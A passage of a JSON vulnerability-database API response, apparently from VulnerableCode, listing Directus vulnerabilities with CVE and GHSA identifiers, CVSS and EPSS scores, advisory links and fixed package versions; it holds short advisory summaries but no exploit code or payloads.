value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:05:28Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35413","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35413"},{"reference_url":"https://github.com/advisories/GHSA-wxwm-3fxv-mrvx","reference_id":"GHSA-wxwm-3fxv-mrvx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wxwm-3fxv-mrvx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188455?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35413","GHSA-wxwm-3fxv-mrvx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gwwu-p9jt-eke3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21999?format=json","vulnerability_id":"VCID-hed8-anm5-ukc9","summary":"Directus has open redirect in SAML\nAn open redirect vulnerability exists in the Directus SAML authentication callback endpoint. The `RelayState` parameter is used in redirects without proper validation against an allowlist of permitted domains.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22032","reference_id":"","reference_type":"","scores":[{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.25007","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22032"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/"}],"url":"https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22032","reference_id":"CVE-2026-22032","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22032"},{"reference_url":"https://github.com/advisories/GHSA-3573-4c68-g8cc","reference_id":"GHSA-3573-4c68-g8cc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3573-4c68-g8cc"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc","reference_id":"GHSA-3573-4c68-g8cc","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72002?format=json","purl":"pkg:npm/directus@11.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.0"}],"aliases":["CVE-2026-22032","GHSA-3573-4c68-g8cc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hed8-anm5-ukc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18457?format=json","vulnerability_id":"VCID-hrqc-8err-4fbx","summary":"Directus affected by VM2 sandbox escape vulnerability\n### Impact\nIn vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the \"Run Script\" operation in flows being able to escape the sandbox running code in the main nodejs context.\n\n### Patches\nPatched in v10.6.0 by replacing `vm2` with `isolated-vm`\n\n### Workarounds\nNone\n\n### References\nhttps://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058"},{"reference_url":"https://github.com/directus/directus/pull/19332","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/pull/19332"},{"reference_url":"https://github.com/advisories/GHSA-22rr-f3p8-5gf8","reference_id":"GHSA-22rr-f3p8-5gf8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-22rr-f3p8-5gf8"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8","reference_id":"GHSA-22rr-f3p8-5gf8","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/65807?format=json","purl":"pkg:npm/directus@10.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-n7m6-zecb-6qh2"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.6.0"}],"aliases":["GHSA-22rr-f3p8-5gf8","GMS-2023-2358"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hrqc-8err-4fbx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20785?format=json","vulnerability_id":"VCID-jjth-fmsp-rfcj","summary":"Directus is Vulnerable to Stored Cross-site Scripting\nA stored cross-site scripting (XSS) vulnerability exists that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64747","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11177","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64747"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/"}],"url":"https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64747","reference_id":"CVE-2025-64747","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64747"},{"reference_url":"https://github.com/advisories/GHSA-vv2v-pw69-8crf","reference_id":"GHSA-vv2v-pw69-8crf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vv2v-pw69-8crf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf","reference_id":"GHSA-vv2v-pw69-8crf","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70180?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64747","GHSA-vv2v-pw69-8crf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jjth-fmsp-rfcj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/274523?format=json","vulnerability_id":"VCID-kqs7-8txh-jyc8","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-6534","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18294","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-6534"},{"reference_url":"https://directus.io","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://directus.io"},{"reference_url":"https://fluidattacks.com/advisories/capaldi","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/"}],"url":"https://fluidattacks.com/advisories/capaldi"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534","reference_id":"CVE-2024-6534","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534"},{"reference_url":"https://directus.io/","reference_id":"directus.io","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/"}],"url":"https://directus.io/"},{"reference_url":"https://github.com/advisories/GHSA-3fff-gqw3-vj86","reference_id":"GHSA-3fff-gqw3-vj86","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3fff-gqw3-vj86"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86","reference_id":"GHSA-3fff-gqw3-vj86","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82575?format=json","purl":"pkg:npm/directus@10.13.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.2"}],"aliases":["CVE-2024-6534","GHSA-3fff-gqw3-vj86"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kqs7-8txh-jyc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/288018?format=json","vulnerability_id":"VCID-m3wb-sstx-v3d6","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-24353","reference_id":"","reference_type":"","scores":[{"value":"0.00347","scoring_system":"epss","scoring_elements":"0.57503","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-24353"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804"},{"reference_url":"https://github.com/directus/directus/pull/23716","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/pull/23716"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.2.0","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.2.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24353","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24353"},{"reference_url":"https://www.youtube.com/watch?v=DbV4IxbWzN4","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://www.youtube.com/watch?v=DbV4IxbWzN4"},{"reference_url":"https://github.com/advisories/GHSA-pmf4-v838-29hg","reference_id":"GHSA-pmf4-v838-29hg","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-pmf4-v838-29hg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/193822?format=json","purl":"pkg:npm/directus@11.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-bjzg-mzjf-cfau"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.2.0"}],"aliases":["CVE-2025-24353","GHSA-pmf4-v838-29hg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m3wb-sstx-v3d6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330168?format=json","vulnerability_id":"VCID-mp82-hx9n-dufy","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35408","reference_id":"","reference_type":"","scores":[{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.00946","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35408"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1"